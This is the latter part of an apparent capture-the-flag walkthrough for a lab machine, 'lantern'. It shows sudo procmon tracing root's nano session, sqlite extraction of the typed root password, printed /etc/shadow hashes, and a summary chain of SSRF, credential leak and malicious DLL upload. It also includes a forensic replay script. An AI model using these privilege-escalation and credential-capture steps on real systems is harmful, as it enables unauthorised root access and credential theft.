root 217 2 0 Aug26 ? 00:00:02 [irq/16-vmwgfx]
root 218 2 0 Aug26 ? 00:00:00 [scsi_tmf_6]
root 219 2 0 Aug26 ? 00:00:00 [scsi_eh_7]
root 220 2 0 Aug26 ? 00:00:00 [scsi_tmf_7]
root 221 2 0 Aug26 ? 00:00:00 [scsi_eh_8]
root 222 2 0 Aug26 ? 00:00:00 [scsi_tmf_8]
root 223 2 0 Aug26 ? 00:00:00 [scsi_eh_9]
root 224 2 0 Aug26 ? 00:00:00 [card0-crtc0]
root 225 2 0 Aug26 ? 00:00:00 [scsi_tmf_9]
root 226 2 0 Aug26 ? 00:00:00 [card0-crtc1]
root 227 2 0 Aug26 ? 00:00:00 [card0-crtc2]
root 230 2 0 Aug26 ? 00:00:00 [scsi_eh_10]
root 231 2 0 Aug26 ? 00:00:00 [card0-crtc3]
root 237 2 0 Aug26 ? 00:00:00 [scsi_tmf_10]
root 238 2 0 Aug26 ? 00:00:00 [card0-crtc4]
root 240 2 0 Aug26 ? 00:00:00 [card0-crtc5]
root 241 2 0 Aug26 ? 00:00:00 [scsi_eh_11]
root 244 2 0 Aug26 ? 00:00:00 [scsi_tmf_11]
root 245 2 0 Aug26 ? 00:00:00 [card0-crtc6]
root 246 2 0 Aug26 ? 00:00:00 [cryptd]
root 247 2 0 Aug26 ? 00:00:00 [scsi_eh_12]
root 249 2 0 Aug26 ? 00:00:00 [scsi_tmf_12]
root 250 2 0 Aug26 ? 00:00:00 [scsi_eh_13]
root 251 2 0 Aug26 ? 00:00:00 [card0-crtc7]
root 255 2 0 Aug26 ? 00:00:00 [scsi_tmf_13]
root 256 2 0 Aug26 ? 00:00:00 [scsi_eh_14]
root 257 2 0 Aug26 ? 00:00:00 [scsi_tmf_14]
root 260 2 0 Aug26 ? 00:00:00 [scsi_eh_15]
root 263 2 0 Aug26 ? 00:00:00 [scsi_tmf_15]
root 277 2 0 Aug26 ? 00:00:00 [scsi_eh_16]
root 278 2 0 Aug26 ? 00:00:00 [scsi_tmf_16]
root 280 2 0 Aug26 ? 00:00:00 [scsi_eh_17]
root 284 2 0 Aug26 ? 00:00:00 [scsi_tmf_17]
root 285 2 0 Aug26 ? 00:00:00 [scsi_eh_18]
root 286 2 0 Aug26 ? 00:00:00 [scsi_tmf_18]
root 289 2 0 Aug26 ? 00:00:00 [scsi_eh_19]
root 291 2 0 Aug26 ? 00:00:00 [scsi_tmf_19]
root 295 2 0 Aug26 ? 00:00:00 [scsi_eh_20]
root 297 2 0 Aug26 ? 00:00:00 [scsi_tmf_20]
root 299 2 0 Aug26 ? 00:00:00 [scsi_eh_21]
root 300 2 0 Aug26 ? 00:00:00 [scsi_tmf_21]
root 302 2 0 Aug26 ? 00:00:00 [scsi_eh_22]
root 303 2 0 Aug26 ? 00:00:00 [scsi_tmf_22]
root 304 2 0 Aug26 ? 00:00:00 [scsi_eh_23]
root 307 2 0 Aug26 ? 00:00:00 [scsi_tmf_23]
root 309 2 0 Aug26 ? 00:00:00 [scsi_eh_24]
root 310 2 0 Aug26 ? 00:00:00 [scsi_tmf_24]
root 311 2 0 Aug26 ? 00:00:00 [scsi_eh_25]
root 312 2 0 Aug26 ? 00:00:00 [scsi_tmf_25]
root 313 2 0 Aug26 ? 00:00:00 [scsi_eh_26]
root 314 2 0 Aug26 ? 00:00:00 [scsi_tmf_26]
root 315 2 0 Aug26 ? 00:00:00 [scsi_eh_27]
root 316 2 0 Aug26 ? 00:00:00 [scsi_tmf_27]
root 317 2 0 Aug26 ? 00:00:00 [scsi_eh_28]
root 318 2 0 Aug26 ? 00:00:00 [scsi_tmf_28]
root 319 2 0 Aug26 ? 00:00:00 [scsi_eh_29]
root 320 2 0 Aug26 ? 00:00:00 [scsi_tmf_29]
root 321 2 0 Aug26 ? 00:00:00 [scsi_eh_30]
root 322 2 0 Aug26 ? 00:00:00 [scsi_tmf_30]
root 323 2 0 Aug26 ? 00:00:00 [scsi_eh_31]
root 324 2 0 Aug26 ? 00:00:00 [scsi_tmf_31]
root 352 2 0 Aug26 ? 00:00:00 [scsi_eh_32]
root 353 2 0 Aug26 ? 00:00:00 [scsi_tmf_32]
root 394 2 0 Aug26 ? 00:00:00 [raid5wq]
root 452 2 0 Aug26 ? 00:00:00 [jbd2/sda2-8]
root 453 2 0 Aug26 ? 00:00:00 [ext4-rsv-conver]
root 511 1 0 Aug26 ? 00:00:05 /lib/systemd/systemd-journald
root 542 2 0 Aug26 ? 00:00:00 [kaluad]
root 543 2 0 Aug26 ? 00:00:00 [kmpath_rdacd]
root 545 2 0 Aug26 ? 00:00:00 [kmpathd]
root 546 2 0 Aug26 ? 00:00:00 [kmpath_handlerd]
root 549 1 0 Aug26 ? 00:00:02 /sbin/multipathd -d -s
root 551 1 0 Aug26 ? 00:00:00 /lib/systemd/systemd-udevd
systemd+ 594 1 0 Aug26 ? 00:00:01 /lib/systemd/systemd-timesyncd
root 599 1 0 Aug26 ? 00:00:02 /sbin/auditd
systemd+ 608 1 0 Aug26 ? 00:00:00 /lib/systemd/systemd-networkd
_laurel 611 599 0 Aug26 ? 00:00:08 /usr/local/sbin/laurel --config /etc/laurel/config.toml
root 635 1 0 Aug26 ? 00:00:00 /usr/bin/VGAuthService
root 636 1 0 Aug26 ? 00:00:32 /usr/bin/vmtoolsd
systemd+ 648 1 0 Aug26 ? 00:00:04 /lib/systemd/systemd-resolved
root 659 2 0 Aug26 ? 00:00:00 [audit_prune_tre]
root 725 1 0 Aug26 ? 00:00:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.et
message+ 835 1 0 Aug26 ? 00:00:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
www-data 838 1 0 Aug26 ? 00:00:06 python3 /var/www/sites/lantern.htb/app.py
www-data 840 1 0 Aug26 ? 00:00:13 dotnet run
root 841 1 0 Aug26 ? 00:00:01 /usr/sbin/irqbalance --foreground
root 843 1 0 Aug26 ? 00:00:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 844 1 0 Aug26 ? 00:00:00 /usr/libexec/polkitd --no-debug
syslog 845 1 0 Aug26 ? 00:00:00 /usr/sbin/rsyslogd -n -iNONE
www-data 846 1 0 Aug26 ? 00:00:07 skipper -routes-file /var/www/sites/skipper/flask.eskip -address :80 -proxy-preserv
root 849 1 0 Aug26 ? 00:00:01 /usr/lib/snapd/snapd
root 852 1 0 Aug26 ? 00:00:00 /lib/systemd/systemd-logind
root 853 1 0 Aug26 ? 00:00:00 /usr/libexec/udisks2/udisksd
root 905 1 0 Aug26 ? 00:00:00 /usr/sbin/ModemManager
root 1122 1 0 Aug26 ? 00:00:00 /usr/sbin/cron -f -P
root 1140 1 0 Aug26 tty1 00:00:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 1153 1 0 Aug26 ? 00:00:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
www-data 1255 840 0 Aug26 ? 00:00:03 dotnet /var/www/sites/.nuget/packages/microsoft.aspnetcore.components.webassembly.d
root 2933 1 0 Aug26 ? 00:00:00 /usr/libexec/upowerd
root 7850 2 0 06:08 ? 00:00:00 [kworker/u256:3-flush-8:0]
root 7975 2 0 06:13 ? 00:00:00 [kworker/u256:2-writeback]
tomas 8145 1 0 06:24 ? 00:00:00 /lib/systemd/systemd --user
tomas 8146 8145 0 06:24 ? 00:00:00 (sd-pam)
root 8666 2 0 06:40 ? 00:00:00 [kworker/0:3-cgroup_destroy]
root 8685 1153 0 06:41 ? 00:00:00 sshd: tomas [priv]
tomas 8747 8685 0 06:41 ? 00:00:00 sshd: tomas@pts/1
tomas 8748 8747 0 06:41 pts/1 00:00:00 -bash
root 8850 2 0 06:47 ? 00:00:00 [kworker/0:0-events]
root 9017 2 0 06:54 ? 00:00:00 [kworker/1:1-cgroup_destroy]
root 9130 2 0 07:00 ? 00:00:00 [kworker/1:0-cgroup_destroy]
root 9188 2 0 07:02 ? 00:00:00 [kworker/u256:0-events_unbound]
root 9205 1 0 07:10 ? 00:00:00 /usr/bin/expect -f /root/bot.exp
root 9206 9205 0 07:10 pts/0 00:00:00 nano /root/automation.sh
root 9220 2 0 07:10 ? 00:00:00 [kworker/1:2-events]
root 9222 2 0 07:10 ? 00:00:00 [kworker/0:1-events]
tomas 9231 1 1 07:10 ? 00:00:01 dotnet run
root 9239 2 0 07:10 ? 00:00:00 [kworker/1:3-cgroup_destroy]
tomas 9251 9231 0 07:10 ? 00:00:00 /home/tomas/LanternAdmin/bin/Debug/net6.0/LanternAdmin
tomas 9278 8748 0 07:11 pts/1 00:00:00 ps -ef
tomas@lantern:~$ sudo /usr/bin/procmon -p 9206 -c db
In file included from <built-in>:2:
In file included from /virtual/include/bcc/bpf.h:12:
In file included from include/linux/types.h:6:
In file included from include/uapi/linux/types.h:14:
In file included from include/uapi/linux/posix_types.h:5:
In file included from include/linux/stddef.h:5:
In file included from include/uapi/linux/stddef.h:5:
In file included from include/linux/compiler_types.h:80:
include/linux/compiler-clang.h:41:9: warning: '__HAVE_BUILTIN_BSWAP32__' macro redefined [-Wmacro-redefined]
#define __HAVE_BUILTIN_BSWAP32__
^
<command line>:4:9: note: previous definition is here
#define __HAVE_BUILTIN_BSWAP32__ 1
^
In file included from <built-in>:2:
In file included from /virtual/include/bcc/bpf.h:12:
In file included from include/linux/types.h:6:
In file included from include/uapi/linux/types.h:14:
In file included from include/uapi/linux/posix_types.h:5:
In file included from include/linux/stddef.h:5:
In file included from include/uapi/linux/stddef.h:5:
In file included from include/linux/compiler_types.h:80:
include/linux/compiler-clang.h:42:9: warning: '__HAVE_BUILTIN_BSWAP64__' macro redefined [-Wmacro-redefined]
#define __HAVE_BUILTIN_BSWAP64__
^
<command line>:5:9: note: previous definition is here
#define __HAVE_BUILTIN_BSWAP64__ 1
^
In file included from <built-in>:2:
In file included from /virtual/include/bcc/bpf.h:12:
In file included from include/linux/types.h:6:
In file included from include/uapi/linux/types.h:14:
In file included from include/uapi/linux/posix_types.h:5:
In file included from include/linux/stddef.h:5:
In file included from include/uapi/linux/stddef.h:5:
In file included from include/linux/compiler_types.h:80:
include/linux/compiler-clang.h:43:9: warning: '__HAVE_BUILTIN_BSWAP16__' macro redefined [-Wmacro-redefined]
#define __HAVE_BUILTIN_BSWAP16__
^
<command line>:3:9: note: previous definition is here
#define __HAVE_BUILTIN_BSWAP16__ 1
^
3 warnings generated.
prog tag mismatch 988359b7a44779c7 1
WARNING: cannot get prog tag, ignore saving source with program tag
prog tag mismatch 7d5844821d4b1151 1
WARNING: cannot get prog tag, ignore saving source with program tag
Procmon 1.0 - (C) 2020 Microsoft Corporation. Licensed under the MIT license.
Copyright (C) 2020 Microsoft Corporation. All rights reserved. Licensed under the MIT license.
Mark Russinovich, Mario Hewardt, Javid Habibi, John Salem
Press Ctrl-C to end monitoring without terminating the process.
PID Filter: 9206
Syscall Filter: All Syscalls
Events captured: 9050^C
Writing events to db
Total events captured: 9050
There is a process running nano /root/automation.sh,
which is very suspicious.
Monitor the system calls of root's process
root 9206 9205 0 07:10 pts/0 00:00:00 nano /root/automation.sh
and save the capture to a local file.
❯ sqlite3 db
SQLite version 3.39.5 2022-10-14 20:58:05
Enter ".help" for usage hints.
sqlite> .tables;
Error: unknown command or invalid arguments: "tables;". Enter ".help" for help
sqlite> .tables
ebpf metadata stats
sqlite> .out out.txt
sqlite> select hex(substr(arguments,9,resultcode)) from ebpf where resultcode > 0 order by timestamp;
sqlite>
shadow
root@lantern:~# cat /etc/shadow | grep \$y
root:$y$j9T$AIkP6DcupUzzLuD19q8Ea.$yfGWAj50b/chhcl4fuZL3jkIlp2NrkL63C5TXcDumJ0:19718:0:99999:7:::
tomas:$y$j9T$iBupKrKnYvDsG24KvgKi61$P9qTNx7BdVbyqWp5homuabzMA/vr.h3fds5VYDeMII3:19718:0:99999:7:::
root@lantern:~# cat bot.exp
#!/usr/bin/expect -f
spawn nano /root/automation.sh
set text "echo Q3Eddtdw3pMB | sudo ./backup.sh"
while {1} {
    foreach char [split $text ""] {
        send "$char"
        sleep 1
    }
    send "\r"
    sleep 0.5
    for {set i 0} {$i < [string length $text]} {incr i} {
        send "\b \b" ;
    }
    send "\r"
}
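The last step, turning the captured write payloads into the text the bot typed, is the same job an incident responder does when replaying a session from an eBPF or auditd trace. The following is an added example, not part of the write-up: it takes hex rows in the shape the sqlite query above prints, applies Enter and backspace to a line buffer and returns each completed line. The rows are constructed from a placeholder command following bot.exp's type-then-erase loop, not from the real capture, and the 8-byte header the query skips with substr(arguments, 9, ...) is assumed already removed.

```python
"""Replay captured write() payloads to reconstruct a typed terminal session.

Added forensic example, not part of the write-up. Rows are constructed."""
import binascii
from typing import List

PLACEHOLDER_CMD = "echo PLACEHOLDER-SECRET | sudo ./backup.sh"  # constructed, not the real secret


def sample_hex_rows(text: str = PLACEHOLDER_CMD) -> List[str]:
    """One row per write(), mirroring bot.exp: each key press, Enter,
    then '\b \b' once per character, then Enter."""
    rows = [binascii.hexlify(ch.encode()).decode().upper() for ch in text]
    rows.append("0D")
    rows.extend(["082008"] * len(text))
    rows.append("0D")
    return rows


def reconstruct(hex_rows: List[str]) -> List[str]:
    """Return each line as it stood when Enter was pressed.

    Backspace is applied to the line buffer, so text the operator later erased
    is still recovered: every keystroke was a syscall and the trace kept them all."""
    lines: List[str] = []
    buf: List[str] = []
    for row in hex_rows:
        for b in binascii.unhexlify(row):
            if b in (0x0D, 0x0A):            # CR/LF: line complete
                if buf:
                    lines.append("".join(buf))
                buf = []
            elif b in (0x08, 0x7F):          # BS/DEL: drop the previous character
                if buf:
                    buf.pop()
            elif 0x20 <= b < 0x7F:           # printable ASCII
                buf.append(chr(b))
            # other control bytes (escape sequences, cursor keys) are ignored here
    if buf:
        lines.append("".join(buf))
    return lines


if __name__ == "__main__":
    for line in reconstruct(sample_hex_rows()):
        print(line)
```

Because every keystroke was a syscall, the text survives even though the bot erases it again with \b \b. That is also the lesson of the sudoers entry: NOPASSWD on a syscall tracer such as procmon amounts to keystroke capture of every root session, so it has to be treated as a root-equivalent grant.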
In summary
user
80 → Skipper Proxy → SSRF → port scan → 5000 → blazor.boot.json → InternaLantern → base64-decode (get port 3000 credentials) → login → app.py → read file → /opt/components/Logs.dll → upload evil DLL → load evil DLL via the Search button
Root
sudo -l → procmon → root's nano /root/automation.sh → dump the eBPF syscall capture → extract strings from the dump